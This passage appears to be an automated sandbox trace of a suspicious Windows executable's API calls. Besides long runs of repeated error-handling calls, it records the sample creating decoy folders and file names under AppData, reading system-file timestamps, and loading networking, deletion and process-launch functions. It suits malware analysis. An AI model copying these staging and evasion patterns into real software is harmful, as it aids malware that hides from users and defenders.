!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0b\x10\x99ô\\ú\x1a", lpUsedDefaultChar=0x0) returned 256 [0033.470] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.470] GetLastError () returned 0x0 [0033.470] SetLastError (dwErrCode=0x0) [0033.470] GetLastError () returned 0x0 [0033.470] SetLastError (dwErrCode=0x0) [0033.470] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.471] GetLastError () returned 0x0 [0033.471] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.472] SetLastError (dwErrCode=0x0) [0033.472] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.473] SetLastError (dwErrCode=0x0) [0033.473] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.474] SetLastError (dwErrCode=0x0) [0033.474] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.475] SetLastError (dwErrCode=0x0) [0033.475] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.476] GetLastError () returned 0x0 [0033.476] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.477] SetLastError (dwErrCode=0x0) [0033.477] GetLastError () returned 0x0 [0033.478] SetLastError (dwErrCode=0x0) [0033.478] GetLastError () returned 0x0 [0033.478] SetLastError (dwErrCode=0x0) [0033.478] GetLastError () returned 0x0 [0033.478] SetLastError (dwErrCode=0x0) [0033.478] GetLastError () returned 0x0 [0033.478] SetLastError (dwErrCode=0x0) [0033.478] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.486] GetLastError () returned 0x0 [0033.486] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.487] SetLastError (dwErrCode=0x0) [0033.487] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.488] GetLastError () returned 0x0 [0033.488] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.489] SetLastError (dwErrCode=0x0) [0033.489] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.490] SetLastError (dwErrCode=0x0) [0033.490] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.491] SetLastError (dwErrCode=0x0) [0033.491] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.492] GetLastError () returned 0x0 [0033.492] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.493] GetLastError () returned 0x0 [0033.493] SetLastError (dwErrCode=0x0) [0033.494] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.494] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.494] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaa0 | out: lpSystemTimeAsFileTime=0x1afaa0*(dwLowDateTime=0xe1a73090, dwHighDateTime=0x1d3dfba)) [0033.495] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af9d8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.495] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af8c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.495] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetLastError () returned 0x0 [0033.496] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.496] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.496] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.496] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.496] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.496] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.496] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.496] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.497] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.497] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.497] GetLastError () returned 0xb7 [0033.497] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.497] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.497] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.497] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.497] wsprintfA (in: param_1=0x1af740, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.497] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.497] wsprintfA (in: param_1=0x1af63c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.497] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.497] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.497] CloseHandle (hObject=0x74) returned 1 [0033.497] GetLastError () returned 0x0 [0033.497] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.497] GetLastError () returned 0x0 [0033.497] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.498] GetSystemDirectoryA (in: lpBuffer=0x1af740, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.498] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.498] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.498] CloseHandle (hObject=0x74) returned 1 [0033.498] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.498] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.498] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.500] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.500] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.500] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.500] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.500] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.500] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.500] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.500] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.501] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.501] 